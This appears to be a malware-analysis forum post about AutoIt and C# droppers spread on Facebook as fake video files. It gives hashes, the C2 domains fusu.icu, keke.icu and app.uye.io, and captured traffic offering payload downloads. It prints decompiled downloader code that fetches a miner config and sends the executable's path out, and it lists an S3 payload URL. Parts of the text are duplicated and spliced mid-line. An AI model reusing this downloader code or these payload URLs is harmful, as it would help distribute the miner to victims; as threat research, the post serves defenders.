Saw it yesterday spreading on facebook groups with random name and packed into .bz archives.
I got 2 samples from that (they are in attachment):
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff - 989.0 KB
It's a compiled AutoIt script, it looks like it's interacting with chrome.exe (shuts it down, reopens it), but I can not exactly replicate the behavior, it seem to have few bugs. :|
The script is obfuscated also, it does not really help.
Files have a bit of network activity:
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478
> HTXP: //keke.icu/download.php
who leak a path: Notice: Undefined variable: id in /var/www/letask.me/site/download.php" and lead also on malware download.
So i end up with 3 domains:
- fusu.icu
- keke.icu
- letask.me
A kind of url shortener service, screenshot of main page:
About the file from the landing page, it's retrieved from amazon cloud.
This one is old from 1 year, it's also in AutoIt, this time the code isn't obfuscated.
Appear to be a downloader for a miner:
0bbe48aca7dfb0bb2d95e6f5e4c16562c674087552b5a16f3c8af4eb25aa6f12 - Detect.exe - 5.0 KB !
This time we have C#:
Fews older AutoIt samples that contact app.uye.io (also found with google):
Video.92894831.mp4.exe - 5e455b9ee3b744c6fa036a2dca24573145a90524ab7b63ebc264fe133d2ff675 - 950.5 KB
Video.50086893.mp4.exe - 8251159756f1f33d65b3730e004b389c7778a299cbcfed86992816d7118c55d1 - 954.5 KB
Video.64931686.mp4.exe - fbad55d6119236b4cc136b67eff538afaee6c522f6bc1cb6416eb29d7381ae6c - 998.0 KB
Video.86693317.mp4.exe - c8ac7f28b6aa16368bd07ab521c648aeecddaf98fe1a0a148ae9a7162c2c0075 - 950.5 KB
CyRadar guys seen it in december 2017, but spreading in messenger: https://translate.google.fr/translate?s ... 7881941%2F
About newest samples, check this write-up by VSM: https://translate.google.fr/translate?s ... &sandbox=1
I got 2 samples from that (they are in attachment):
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff - 989.0 KB
It's a compiled AutoIt script, it looks like it's interacting with chrome.exe (shuts it down, reopens it), but I can not exactly replicate the behavior, it seem to have few bugs. :|
The script is obfuscated also, it does not really help.
Files have a bit of network activity:
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478
Code: Select all
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff:
HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: C:\
ScriptName: play_12907320.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: Yes
Accept: */*
Host: fusu.icu
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:12:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=dd82fe00871874ea7410c9eac913fd5d31556410323; expires=Mon, 27-Apr-20 00:12:03 GMT; path=/; domain=.fusu.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://fusu.icu/app/7za.exe?id=3243
zip : http://fusu.icu/app/files.7z?id=3775
Server: cloudflare
CF-RAY: 4ce4d28c6c3da8db-CDG
Code: Select all
Looking closer on keke.icu i found it host few landings, including:HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: Monitoring - API Monitor v2 32-bit (Administrator)
ScriptName: play_67487566.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: No
Accept: */*
Host: keke.icu
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:53:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=d44b26fd3c0765f3f834515909abca53f1556412782; expires=Mon, 27-Apr-20 00:53:02 GMT; path=/; domain=.keke.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://keke.icu/app/7za.exe?id=6986
zip : http://keke.icu/app/files.7z?id=8734
Server: cloudflare
CF-RAY: 4ce50e947c00b75f-CDG
> HTXP: //keke.icu/download.php
who leak a path: Notice: Undefined variable: id in /var/www/letask.me/site/download.php" and lead also on malware download.
So i end up with 3 domains:
- fusu.icu
- keke.icu
- letask.me
A kind of url shortener service, screenshot of main page:
About the file from the landing page, it's retrieved from amazon cloud.
Code: Select all
37f0c2bb29eaa07cb5c8649871062afe3c261caaf76c7b52d49b04a97a7262e8 - 963.5 KB - VxVault (pulled today)a.href = "https://s3-us-west-2.amazonaws.com/dataval/FBVideo.exe";
This one is old from 1 year, it's also in AutoIt, this time the code isn't obfuscated.
Appear to be a downloader for a miner:
Code: Select all
So i did few search on google about "app.uye.io" and i found that:Func getconfig()
$xhr = ObjCreate("winhttp.winhttprequest.5.1")
$xhr.open("GET", "https://app.uye.io/miner/config.php", False)
$xhr.setrequestheader("User-Agent", "Miner")
$xhr.send()
$return = $xhr.responsetext
If $return = "denied" Then Exit
createappfolder()
$data = _stringexplode($return, "#", 0)
For $file In $data
downloadfile($file)
Next
copyself()
EndFunc
0bbe48aca7dfb0bb2d95e6f5e4c16562c674087552b5a16f3c8af4eb25aa6f12 - Detect.exe - 5.0 KB !
This time we have C#:
Code: Select all
Very similar code, maybe a test, no idea.internal sealed class Detect
{
// Methods
[STAThread]
public static void Main()
{
string location = Assembly.GetExecutingAssembly().Location;
string str2 = "denied";
try
{
using (WebClient client = new WebClient())
{
client.Headers[HttpRequestHeader.UserAgent] = "Miner";
str2 = client.DownloadString("https://app.uye.io/miner/boxlog.php?path=" + location);
}
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
ProjectData.ClearProjectError();
}
}
}
Fews older AutoIt samples that contact app.uye.io (also found with google):
Video.92894831.mp4.exe - 5e455b9ee3b744c6fa036a2dca24573145a90524ab7b63ebc264fe133d2ff675 - 950.5 KB
Video.50086893.mp4.exe - 8251159756f1f33d65b3730e004b389c7778a299cbcfed86992816d7118c55d1 - 954.5 KB
Video.64931686.mp4.exe - fbad55d6119236b4cc136b67eff538afaee6c522f6bc1cb6416eb29d7381ae6c - 998.0 KB
Video.86693317.mp4.exe - c8ac7f28b6aa16368bd07ab521c648aeecddaf98fe1a0a148ae9a7162c2c0075 - 950.5 KB
CyRadar guys seen it in december 2017, but spreading in messenger: https://translate.google.fr/translate?s ... 7881941%2F
About newest samples, check this write-up by VSM: https://translate.google.fr/translate?s ... &sandbox=1
Attachments
infected
(990.92 KiB) Downloaded 27 times
(990.92 KiB) Downloaded 27 times